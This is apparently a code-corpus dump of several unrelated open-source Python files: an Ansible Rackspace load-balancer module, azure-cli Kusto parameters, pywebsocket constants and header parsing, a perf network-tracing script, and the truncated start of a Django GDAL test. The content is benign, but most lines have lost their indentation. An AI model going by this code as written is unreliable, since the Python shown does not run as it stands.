virtualenv=dict(),
wait=dict(default=False, type='bool'),
wait_timeout=dict(default=30, type='int'),
weight=dict(type='int'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together(),
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
address = module.params['address']
condition = (module.params['condition'] and
module.params['condition'].upper())
load_balancer_id = module.params['load_balancer_id']
node_id = module.params['node_id']
port = module.params['port']
state = module.params['state']
typ = module.params['type'] and module.params['type'].upper()
virtualenv = module.params['virtualenv']
wait = module.params['wait']
wait_timeout = module.params['wait_timeout'] or 1
weight = module.params['weight']
if virtualenv:
try:
_activate_virtualenv(virtualenv)
        except IOError as e:
module.fail_json(msg='Failed to activate virtualenv %s (%s)' % (
virtualenv, e))
setup_rax_module(module, pyrax)
if not pyrax.cloud_loadbalancers:
module.fail_json(msg='Failed to instantiate client. This '
'typically indicates an invalid region or an '
'incorrectly capitalized region name.')
try:
lb = pyrax.cloud_loadbalancers.get(load_balancer_id)
    except pyrax.exc.PyraxException as e:
module.fail_json(msg='%s' % e.message)
node = _get_node(lb, node_id, address, port)
result = rax_clb_node_to_dict(node)
if state == 'absent':
if not node: # Removing a non-existent node
module.exit_json(changed=False, state=state)
try:
lb.delete_node(node)
result = {}
except pyrax.exc.NotFound:
module.exit_json(changed=False, state=state)
        except pyrax.exc.PyraxException as e:
module.fail_json(msg='%s' % e.message)
else: # present
if not node:
if node_id: # Updating a non-existent node
msg = 'Node %d not found' % node_id
if lb.nodes:
msg += (' (available nodes: %s)' %
', '.join([str(x.id) for x in lb.nodes]))
module.fail_json(msg=msg)
else: # Creating a new node
try:
node = pyrax.cloudloadbalancers.Node(
address=address, port=port, condition=condition,
weight=weight, type=typ)
resp, body = lb.add_nodes([node])
result.update(body['nodes'][0])
                except pyrax.exc.PyraxException as e:
module.fail_json(msg='%s' % e.message)
else: # Updating an existing node
mutable = {
'condition': condition,
'type': typ,
'weight': weight,
}
for name, value in mutable.items():
if value is None or value == getattr(node, name):
mutable.pop(name)
if not mutable:
module.exit_json(changed=False, state=state, node=result)
try:
# The diff has to be set explicitly to update node's weight and
# type; this should probably be fixed in pyrax
lb.update_node(node, diff=mutable)
result.update(mutable)
            except pyrax.exc.PyraxException as e:
module.fail_json(msg='%s' % e.message)
if wait:
pyrax.utils.wait_until(lb, "status", "ACTIVE", interval=1,
attempts=wait_timeout)
if lb.status != 'ACTIVE':
module.fail_json(
msg='Load balancer not active after %ds (current status: %s)' %
(wait_timeout, lb.status.lower()))
kwargs = {'node': result} if result else {}
module.exit_json(changed=True, state=state, **kwargs)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
# invoke the module
main()
|
gpl-3.0
|
yugangw-msft/azure-cli
|
src/azure-cli/azure/cli/command_modules/kusto/_params.py
|
6
|
1902
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from knack.arguments import CLIArgumentType
from azure.cli.core.commands.parameters import (name_type, get_enum_type)
from .custom import (
AzureSkuName
)
def load_arguments(self, _):
# Kusto clusters
sku_arg_type = CLIArgumentType(help='The name of the sku.',
arg_type=get_enum_type(AzureSkuName))
    time_format_explanation = 'Duration in ISO8601 format (for example, 100 days would be P100D).'
with self.argument_context('kusto cluster') as c:
c.ignore('kusto_management_request_options')
c.argument('cluster_name', arg_type=name_type, help='The name of the cluster.', id_part='name')
c.argument('sku', arg_type=sku_arg_type)
c.argument('capacity', type=int, help='The instance number of the VM.')
# Kusto databases
with self.argument_context('kusto database') as c:
c.ignore('kusto_management_request_options')
c.argument('cluster_name', help='The name of the cluster.', id_part='name')
c.argument('database_name', arg_type=name_type, help='The name of the database.', id_part='child_name_1')
        c.argument('soft_delete_period', help='Amount of time that data should be kept so it is available to query. ' + time_format_explanation)
        c.argument('hot_cache_period', help='Amount of time that data should be kept in cache. ' + time_format_explanation)
# Kusto database list
with self.argument_context('kusto database list') as c:
c.argument('cluster_name', id_part=None)
|
mit
|
yanirs/servo
|
tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/common.py
|
489
|
9947
|
# Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file must not depend on any module specific to the WebSocket protocol.
"""
from mod_pywebsocket import http_header_util
# Additional log level definitions.
LOGLEVEL_FINE = 9
# Constants indicating WebSocket protocol version.
VERSION_HIXIE75 = -1
VERSION_HYBI00 = 0
VERSION_HYBI01 = 1
VERSION_HYBI02 = 2
VERSION_HYBI03 = 2
VERSION_HYBI04 = 4
VERSION_HYBI05 = 5
VERSION_HYBI06 = 6
VERSION_HYBI07 = 7
VERSION_HYBI08 = 8
VERSION_HYBI09 = 8
VERSION_HYBI10 = 8
VERSION_HYBI11 = 8
VERSION_HYBI12 = 8
VERSION_HYBI13 = 13
VERSION_HYBI14 = 13
VERSION_HYBI15 = 13
VERSION_HYBI16 = 13
VERSION_HYBI17 = 13
# Constants indicating WebSocket protocol latest version.
VERSION_HYBI_LATEST = VERSION_HYBI13
# Port numbers
DEFAULT_WEB_SOCKET_PORT = 80
DEFAULT_WEB_SOCKET_SECURE_PORT = 443
# Schemes
WEB_SOCKET_SCHEME = 'ws'
WEB_SOCKET_SECURE_SCHEME = 'wss'
# Frame opcodes defined in the spec.
OPCODE_CONTINUATION = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
# UUIDs used by HyBi 04 and later opening handshake and frame masking.
WEBSOCKET_ACCEPT_UUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
# Opening handshake header names and expected values.
UPGRADE_HEADER = 'Upgrade'
WEBSOCKET_UPGRADE_TYPE = 'websocket'
WEBSOCKET_UPGRADE_TYPE_HIXIE75 = 'WebSocket'
CONNECTION_HEADER = 'Connection'
UPGRADE_CONNECTION_TYPE = 'Upgrade'
HOST_HEADER = 'Host'
ORIGIN_HEADER = 'Origin'
SEC_WEBSOCKET_ORIGIN_HEADER = 'Sec-WebSocket-Origin'
SEC_WEBSOCKET_KEY_HEADER = 'Sec-WebSocket-Key'
SEC_WEBSOCKET_ACCEPT_HEADER = 'Sec-WebSocket-Accept'
SEC_WEBSOCKET_VERSION_HEADER = 'Sec-WebSocket-Version'
SEC_WEBSOCKET_PROTOCOL_HEADER = 'Sec-WebSocket-Protocol'
SEC_WEBSOCKET_EXTENSIONS_HEADER = 'Sec-WebSocket-Extensions'
SEC_WEBSOCKET_DRAFT_HEADER = 'Sec-WebSocket-Draft'
SEC_WEBSOCKET_KEY1_HEADER = 'Sec-WebSocket-Key1'
SEC_WEBSOCKET_KEY2_HEADER = 'Sec-WebSocket-Key2'
SEC_WEBSOCKET_LOCATION_HEADER = 'Sec-WebSocket-Location'
# Extensions
DEFLATE_FRAME_EXTENSION = 'deflate-frame'
PERMESSAGE_COMPRESSION_EXTENSION = 'permessage-compress'
PERMESSAGE_DEFLATE_EXTENSION = 'permessage-deflate'
X_WEBKIT_DEFLATE_FRAME_EXTENSION = 'x-webkit-deflate-frame'
X_WEBKIT_PERMESSAGE_COMPRESSION_EXTENSION = 'x-webkit-permessage-compress'
MUX_EXTENSION = 'mux_DO_NOT_USE'
# Status codes
# The codes STATUS_NO_STATUS_RECEIVED, STATUS_ABNORMAL_CLOSURE, and
# STATUS_TLS_HANDSHAKE are pseudo codes to indicate specific error cases.
# They must not be used as codes in actual closing frames.
# Application level errors must use codes in the range
# STATUS_USER_REGISTERED_BASE to STATUS_USER_PRIVATE_MAX. The codes in the
# range STATUS_USER_REGISTERED_BASE to STATUS_USER_REGISTERED_MAX are managed
# by IANA. Usually an application must define user protocol level errors in
# the range STATUS_USER_PRIVATE_BASE to STATUS_USER_PRIVATE_MAX.
STATUS_NORMAL_CLOSURE = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA = 1003
STATUS_NO_STATUS_RECEIVED = 1005
STATUS_ABNORMAL_CLOSURE = 1006
STATUS_INVALID_FRAME_PAYLOAD_DATA = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_MANDATORY_EXTENSION = 1010
STATUS_INTERNAL_ENDPOINT_ERROR = 1011
STATUS_TLS_HANDSHAKE = 1015
STATUS_USER_REGISTERED_BASE = 3000
STATUS_USER_REGISTERED_MAX = 3999
STATUS_USER_PRIVATE_BASE = 4000
STATUS_USER_PRIVATE_MAX = 4999
# Following definitions are aliases to keep compatibility. Applications must
# not use these obsoleted definitions anymore.
STATUS_NORMAL = STATUS_NORMAL_CLOSURE
STATUS_UNSUPPORTED = STATUS_UNSUPPORTED_DATA
STATUS_CODE_NOT_AVAILABLE = STATUS_NO_STATUS_RECEIVED
STATUS_ABNORMAL_CLOSE = STATUS_ABNORMAL_CLOSURE
STATUS_INVALID_FRAME_PAYLOAD = STATUS_INVALID_FRAME_PAYLOAD_DATA
STATUS_MANDATORY_EXT = STATUS_MANDATORY_EXTENSION
# HTTP status codes
HTTP_STATUS_BAD_REQUEST = 400
HTTP_STATUS_FORBIDDEN = 403
HTTP_STATUS_NOT_FOUND = 404
def is_control_opcode(opcode):
return (opcode >> 3) == 1
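# Example: control opcodes are exactly those with bit 3 set (0x8-0xf), so
# is_control_opcode(OPCODE_CLOSE) and is_control_opcode(OPCODE_PING) are
# True, while a data opcode such as OPCODE_TEXT (0x1) yields False.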
class ExtensionParameter(object):
"""Holds information about an extension which is exchanged on extension
negotiation in opening handshake.
"""
def __init__(self, name):
self._name = name
# TODO(tyoshino): Change the data structure to more efficient one such
# as dict when the spec changes to say like
# - Parameter names must be unique
# - The order of parameters is not significant
self._parameters = []
def name(self):
return self._name
def add_parameter(self, name, value):
self._parameters.append((name, value))
def get_parameters(self):
return self._parameters
def get_parameter_names(self):
return [name for name, unused_value in self._parameters]
def has_parameter(self, name):
for param_name, param_value in self._parameters:
if param_name == name:
return True
return False
def get_parameter_value(self, name):
for param_name, param_value in self._parameters:
if param_name == name:
return param_value
class ExtensionParsingException(Exception):
def __init__(self, name):
super(ExtensionParsingException, self).__init__(name)
def _parse_extension_param(state, definition):
param_name = http_header_util.consume_token(state)
if param_name is None:
raise ExtensionParsingException('No valid parameter name found')
http_header_util.consume_lwses(state)
if not http_header_util.consume_string(state, '='):
definition.add_parameter(param_name, None)
return
http_header_util.consume_lwses(state)
# TODO(tyoshino): Add code to validate that parsed param_value is token
param_value = http_header_util.consume_token_or_quoted_string(state)
if param_value is None:
raise ExtensionParsingException(
'No valid parameter value found on the right-hand side of '
'parameter %r' % param_name)
definition.add_parameter(param_name, param_value)
def _parse_extension(state):
extension_token = http_header_util.consume_token(state)
if extension_token is None:
return None
extension = ExtensionParameter(extension_token)
while True:
http_header_util.consume_lwses(state)
if not http_header_util.consume_string(state, ';'):
break
http_header_util.consume_lwses(state)
try:
_parse_extension_param(state, extension)
        except ExtensionParsingException as e:
raise ExtensionParsingException(
'Failed to parse parameter for %r (%r)' %
(extension_token, e))
return extension
def parse_extensions(data):
"""Parses Sec-WebSocket-Extensions header value returns a list of
ExtensionParameter objects.
Leading LWSes must be trimmed.
"""
state = http_header_util.ParsingState(data)
extension_list = []
while True:
extension = _parse_extension(state)
if extension is not None:
extension_list.append(extension)
http_header_util.consume_lwses(state)
if http_header_util.peek(state) is None:
break
if not http_header_util.consume_string(state, ','):
raise ExtensionParsingException(
'Failed to parse Sec-WebSocket-Extensions header: '
'Expected a comma but found %r' %
http_header_util.peek(state))
http_header_util.consume_lwses(state)
if len(extension_list) == 0:
raise ExtensionParsingException(
'No valid extension entry found')
return extension_list
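# Example (illustrative header value): parsing
# 'permessage-deflate; client_max_window_bits=10' yields a single
# ExtensionParameter named 'permessage-deflate' whose get_parameters()
# returns [('client_max_window_bits', '10')].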
def format_extension(extension):
"""Formats an ExtensionParameter object."""
formatted_params = [extension.name()]
for param_name, param_value in extension.get_parameters():
if param_value is None:
formatted_params.append(param_name)
else:
quoted_value = http_header_util.quote_if_necessary(param_value)
formatted_params.append('%s=%s' % (param_name, quoted_value))
return '; '.join(formatted_params)
def format_extensions(extension_list):
"""Formats a list of ExtensionParameter objects."""
formatted_extension_list = []
for extension in extension_list:
formatted_extension_list.append(format_extension(extension))
return ', '.join(formatted_extension_list)
# vi:sts=4 sw=4 et
|
mpl-2.0
|
GuneetAtwal/Blaze.Kernel-MT6589
|
tools/perf/scripts/python/netdev-times.py
|
11271
|
15048
|
# Display the processing of packets and the time each step takes.
# It helps us investigate networking and network device behavior.
#
# options
# tx: show only tx chart
# rx: show only rx chart
# dev=: show only thing related to specified device
# debug: work with debug mode. It shows buffer status.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
all_event_list = []; # all tracepoint events related to this script
irq_dic = {}; # key is cpu and value is a list which stacks irqs
              # which raise NET_RX softirq
net_rx_dic = {}; # key is cpu and value includes time of NET_RX softirq-entry
                 # and a list which stacks receive
receive_hunk_list = []; # a list which includes a sequence of receive events
rx_skb_list = []; # received packet list for matching
# skb_copy_datagram_iovec
buffer_budget = 65536; # the budget of rx_skb_list, tx_queue_list and
# tx_xmit_list
of_count_rx_skb_list = 0; # overflow count
tx_queue_list = []; # list of packets which pass through dev_queue_xmit
of_count_tx_queue_list = 0; # overflow count
tx_xmit_list = []; # list of packets which pass through dev_hard_start_xmit
of_count_tx_xmit_list = 0; # overflow count
tx_free_list = []; # list of packets which is freed
# options
show_tx = 0;
show_rx = 0;
dev = 0; # store a name of device specified by option "dev="
debug = 0;
# indices of event_info tuple
EINFO_IDX_NAME= 0
EINFO_IDX_CONTEXT=1
EINFO_IDX_CPU= 2
EINFO_IDX_TIME= 3
EINFO_IDX_PID= 4
EINFO_IDX_COMM= 5
# Calculate a time interval (msec) from src (nsec) to dst (nsec)
def diff_msec(src, dst):
return (dst - src) / 1000000.0
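# e.g. diff_msec(1000000000, 1002500000) -> 2.5 (illustrative nanosecond
# timestamps 2.5 msec apart)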
# Display a process of transmitting a packet
def print_transmit(hunk):
if dev != 0 and hunk['dev'].find(dev) < 0:
return
print "%7s %5d %6d.%06dsec %12.3fmsec %12.3fmsec" % \
(hunk['dev'], hunk['len'],
nsecs_secs(hunk['queue_t']),
nsecs_nsecs(hunk['queue_t'])/1000,
diff_msec(hunk['queue_t'], hunk['xmit_t']),
diff_msec(hunk['xmit_t'], hunk['free_t']))
# Format for displaying rx packet processing
PF_IRQ_ENTRY= " irq_entry(+%.3fmsec irq=%d:%s)"
PF_SOFT_ENTRY=" softirq_entry(+%.3fmsec)"
PF_NAPI_POLL= " napi_poll_exit(+%.3fmsec %s)"
PF_JOINT= " |"
PF_WJOINT= " | |"
PF_NET_RECV= " |---netif_receive_skb(+%.3fmsec skb=%x len=%d)"
PF_NET_RX= " |---netif_rx(+%.3fmsec skb=%x)"
PF_CPY_DGRAM= " | skb_copy_datagram_iovec(+%.3fmsec %d:%s)"
PF_KFREE_SKB= " | kfree_skb(+%.3fmsec location=%x)"
PF_CONS_SKB= " | consume_skb(+%.3fmsec)"
# Display the processing of received packets and the interrupts associated
# with a NET_RX softirq
def print_receive(hunk):
show_hunk = 0
irq_list = hunk['irq_list']
cpu = irq_list[0]['cpu']
base_t = irq_list[0]['irq_ent_t']
    # check if this hunk should be shown
if dev != 0:
for i in range(len(irq_list)):
if irq_list[i]['name'].find(dev) >= 0:
show_hunk = 1
break
else:
show_hunk = 1
if show_hunk == 0:
return
print "%d.%06dsec cpu=%d" % \
(nsecs_secs(base_t), nsecs_nsecs(base_t)/1000, cpu)
for i in range(len(irq_list)):
print PF_IRQ_ENTRY % \
(diff_msec(base_t, irq_list[i]['irq_ent_t']),
irq_list[i]['irq'], irq_list[i]['name'])
print PF_JOINT
irq_event_list = irq_list[i]['event_list']
for j in range(len(irq_event_list)):
irq_event = irq_event_list[j]
if irq_event['event'] == 'netif_rx':
print PF_NET_RX % \
(diff_msec(base_t, irq_event['time']),
irq_event['skbaddr'])
print PF_JOINT
print PF_SOFT_ENTRY % \
diff_msec(base_t, hunk['sirq_ent_t'])
print PF_JOINT
event_list = hunk['event_list']
for i in range(len(event_list)):
event = event_list[i]
if event['event_name'] == 'napi_poll':
print PF_NAPI_POLL % \
(diff_msec(base_t, event['event_t']), event['dev'])
if i == len(event_list) - 1:
print ""
else:
print PF_JOINT
else:
print PF_NET_RECV % \
(diff_msec(base_t, event['event_t']), event['skbaddr'],
event['len'])
if 'comm' in event.keys():
print PF_WJOINT
print PF_CPY_DGRAM % \
(diff_msec(base_t, event['comm_t']),
event['pid'], event['comm'])
elif 'handle' in event.keys():
print PF_WJOINT
if event['handle'] == "kfree_skb":
print PF_KFREE_SKB % \
(diff_msec(base_t,
event['comm_t']),
event['location'])
elif event['handle'] == "consume_skb":
print PF_CONS_SKB % \
diff_msec(base_t,
event['comm_t'])
print PF_JOINT
def trace_begin():
global show_tx
global show_rx
global dev
global debug
for i in range(len(sys.argv)):
if i == 0:
continue
arg = sys.argv[i]
if arg == 'tx':
show_tx = 1
elif arg =='rx':
show_rx = 1
elif arg.find('dev=',0, 4) >= 0:
dev = arg[4:]
elif arg == 'debug':
debug = 1
if show_tx == 0 and show_rx == 0:
show_tx = 1
show_rx = 1
def trace_end():
# order all events in time
all_event_list.sort(lambda a,b :cmp(a[EINFO_IDX_TIME],
b[EINFO_IDX_TIME]))
# process all events
for i in range(len(all_event_list)):
event_info = all_event_list[i]
name = event_info[EINFO_IDX_NAME]
if name == 'irq__softirq_exit':
handle_irq_softirq_exit(event_info)
elif name == 'irq__softirq_entry':
handle_irq_softirq_entry(event_info)
elif name == 'irq__softirq_raise':
handle_irq_softirq_raise(event_info)
elif name == 'irq__irq_handler_entry':
handle_irq_handler_entry(event_info)
elif name == 'irq__irq_handler_exit':
handle_irq_handler_exit(event_info)
elif name == 'napi__napi_poll':
handle_napi_poll(event_info)
elif name == 'net__netif_receive_skb':
handle_netif_receive_skb(event_info)
elif name == 'net__netif_rx':
handle_netif_rx(event_info)
elif name == 'skb__skb_copy_datagram_iovec':
handle_skb_copy_datagram_iovec(event_info)
elif name == 'net__net_dev_queue':
handle_net_dev_queue(event_info)
elif name == 'net__net_dev_xmit':
handle_net_dev_xmit(event_info)
elif name == 'skb__kfree_skb':
handle_kfree_skb(event_info)
elif name == 'skb__consume_skb':
handle_consume_skb(event_info)
# display receive hunks
if show_rx:
for i in range(len(receive_hunk_list)):
print_receive(receive_hunk_list[i])
# display transmit hunks
if show_tx:
print " dev len Qdisc " \
" netdevice free"
for i in range(len(tx_free_list)):
print_transmit(tx_free_list[i])
if debug:
print "debug buffer status"
print "----------------------------"
print "xmit Qdisc:remain:%d overflow:%d" % \
(len(tx_queue_list), of_count_tx_queue_list)
print "xmit netdevice:remain:%d overflow:%d" % \
(len(tx_xmit_list), of_count_tx_xmit_list)
print "receive:remain:%d overflow:%d" % \
(len(rx_skb_list), of_count_rx_skb_list)
# called from perf when it finds a corresponding event
def irq__softirq_entry(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__softirq_exit(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__softirq_raise(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__irq_handler_entry(name, context, cpu, sec, nsec, pid, comm,
irq, irq_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
irq, irq_name)
all_event_list.append(event_info)
def irq__irq_handler_exit(name, context, cpu, sec, nsec, pid, comm, irq, ret):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, ret)
all_event_list.append(event_info)
def napi__napi_poll(name, context, cpu, sec, nsec, pid, comm, napi, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
napi, dev_name)
all_event_list.append(event_info)
def net__netif_receive_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr,
skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__netif_rx(name, context, cpu, sec, nsec, pid, comm, skbaddr,
skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__net_dev_queue(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__net_dev_xmit(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen, rc, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
                  skbaddr, skblen, rc, dev_name)
all_event_list.append(event_info)
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
skbaddr, protocol, location):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, protocol, location)
all_event_list.append(event_info)
def skb__consume_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr)
all_event_list.append(event_info)
def skb__skb_copy_datagram_iovec(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen)
all_event_list.append(event_info)
def handle_irq_handler_entry(event_info):
(name, context, cpu, time, pid, comm, irq, irq_name) = event_info
if cpu not in irq_dic.keys():
irq_dic[cpu] = []
irq_record = {'irq':irq, 'name':irq_name, 'cpu':cpu, 'irq_ent_t':time}
irq_dic[cpu].append(irq_record)
def handle_irq_handler_exit(event_info):
(name, context, cpu, time, pid, comm, irq, ret) = event_info
if cpu not in irq_dic.keys():
return
irq_record = irq_dic[cpu].pop()
if irq != irq_record['irq']:
return
irq_record.update({'irq_ext_t':time})
    # if an irq doesn't include a NET_RX softirq, drop it.
if 'event_list' in irq_record.keys():
irq_dic[cpu].append(irq_record)
def handle_irq_softirq_raise(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
if cpu not in irq_dic.keys() \
or len(irq_dic[cpu]) == 0:
return
irq_record = irq_dic[cpu].pop()
if 'event_list' in irq_record.keys():
irq_event_list = irq_record['event_list']
else:
irq_event_list = []
irq_event_list.append({'time':time, 'event':'sirq_raise'})
irq_record.update({'event_list':irq_event_list})
irq_dic[cpu].append(irq_record)
def handle_irq_softirq_entry(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
net_rx_dic[cpu] = {'sirq_ent_t':time, 'event_list':[]}
def handle_irq_softirq_exit(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
irq_list = []
event_list = 0
if cpu in irq_dic.keys():
irq_list = irq_dic[cpu]
del irq_dic[cpu]
if cpu in net_rx_dic.keys():
sirq_ent_t = net_rx_dic[cpu]['sirq_ent_t']
event_list = net_rx_dic[cpu]['event_list']
del net_rx_dic[cpu]
if irq_list == [] or event_list == 0:
return
rec_data = {'sirq_ent_t':sirq_ent_t, 'sirq_ext_t':time,
'irq_list':irq_list, 'event_list':event_list}
    # merge information related to a NET_RX softirq
receive_hunk_list.append(rec_data)
def handle_napi_poll(event_info):
(name, context, cpu, time, pid, comm, napi, dev_name) = event_info
if cpu in net_rx_dic.keys():
event_list = net_rx_dic[cpu]['event_list']
rec_data = {'event_name':'napi_poll',
'dev':dev_name, 'event_t':time}
event_list.append(rec_data)
def handle_netif_rx(event_info):
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
if cpu not in irq_dic.keys() \
or len(irq_dic[cpu]) == 0:
return
irq_record = irq_dic[cpu].pop()
if 'event_list' in irq_record.keys():
irq_event_list = irq_record['event_list']
else:
irq_event_list = []
irq_event_list.append({'time':time, 'event':'netif_rx',
'skbaddr':skbaddr, 'skblen':skblen, 'dev_name':dev_name})
irq_record.update({'event_list':irq_event_list})
irq_dic[cpu].append(irq_record)
def handle_netif_receive_skb(event_info):
global of_count_rx_skb_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
if cpu in net_rx_dic.keys():
rec_data = {'event_name':'netif_receive_skb',
'event_t':time, 'skbaddr':skbaddr, 'len':skblen}
event_list = net_rx_dic[cpu]['event_list']
event_list.append(rec_data)
rx_skb_list.insert(0, rec_data)
if len(rx_skb_list) > buffer_budget:
rx_skb_list.pop()
of_count_rx_skb_list += 1
def handle_net_dev_queue(event_info):
global of_count_tx_queue_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
skb = {'dev':dev_name, 'skbaddr':skbaddr, 'len':skblen, 'queue_t':time}
tx_queue_list.insert(0, skb)
if len(tx_queue_list) > buffer_budget:
tx_queue_list.pop()
of_count_tx_queue_list += 1
def handle_net_dev_xmit(event_info):
global of_count_tx_xmit_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, rc, dev_name) = event_info
if rc == 0: # NETDEV_TX_OK
for i in range(len(tx_queue_list)):
skb = tx_queue_list[i]
if skb['skbaddr'] == skbaddr:
skb['xmit_t'] = time
tx_xmit_list.insert(0, skb)
del tx_queue_list[i]
if len(tx_xmit_list) > buffer_budget:
tx_xmit_list.pop()
of_count_tx_xmit_list += 1
return
def handle_kfree_skb(event_info):
(name, context, cpu, time, pid, comm,
skbaddr, protocol, location) = event_info
for i in range(len(tx_queue_list)):
skb = tx_queue_list[i]
if skb['skbaddr'] == skbaddr:
del tx_queue_list[i]
return
for i in range(len(tx_xmit_list)):
skb = tx_xmit_list[i]
if skb['skbaddr'] == skbaddr:
skb['free_t'] = time
tx_free_list.append(skb)
del tx_xmit_list[i]
return
for i in range(len(rx_skb_list)):
rec_data = rx_skb_list[i]
if rec_data['skbaddr'] == skbaddr:
rec_data.update({'handle':"kfree_skb",
'comm':comm, 'pid':pid, 'comm_t':time})
del rx_skb_list[i]
return
def handle_consume_skb(event_info):
(name, context, cpu, time, pid, comm, skbaddr) = event_info
for i in range(len(tx_xmit_list)):
skb = tx_xmit_list[i]
if skb['skbaddr'] == skbaddr:
skb['free_t'] = time
tx_free_list.append(skb)
del tx_xmit_list[i]
return
def handle_skb_copy_datagram_iovec(event_info):
(name, context, cpu, time, pid, comm, skbaddr, skblen) = event_info
for i in range(len(rx_skb_list)):
rec_data = rx_skb_list[i]
if skbaddr == rec_data['skbaddr']:
rec_data.update({'handle':"skb_copy_datagram_iovec",
'comm':comm, 'pid':pid, 'comm_t':time})
del rx_skb_list[i]
return
|
gpl-2.0
|
yamila-moreno/django
|
tests/gis_tests/gdal_tests/test_geom.py
|
256
|
20748
|
import json
import unittest
from binascii import b2a_hex
from unittest import skipUnless
from django.contrib.gis.gdal import HAS_GDAL
from django.utils.six.moves import range
from ..test_data import TestDataMixin
try:
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
if HAS_GDAL:
from django.contrib.gis.gdal import (OGRGeometry, OGRGeomType,
GDALException, OGRIndexError, SpatialReference, CoordTransform,
GDAL_VERSION)
@skipUnless(HAS_GDAL, "GDAL is required")
class OGRGeomTest(unittest.TestCase, TestDataMixin):
"This tests the OGR Geometry."
def test_geomtype(self):
"Testing OGRGeomType object."
# OGRGeomType should initialize on all these inputs.
OGRGeomType(1)
OGRGeomType(7)
OGRGeomType('point')
OGRGeomType('GeometrycollectioN')
OGRGeomType('LINearrING')
OGRGeomType('Unknown')
        # Should raise GDALException on these invalid inputs.
self.assertRaises(GDALException, OGRGeomType, 23)
self.assertRaises(GDALException, OGRGeomType, 'fooD')
self.assertRaises(GDALException, OGRGeomType, 9)
# Equivalence can take strings, ints, and other OGRGeomTypes
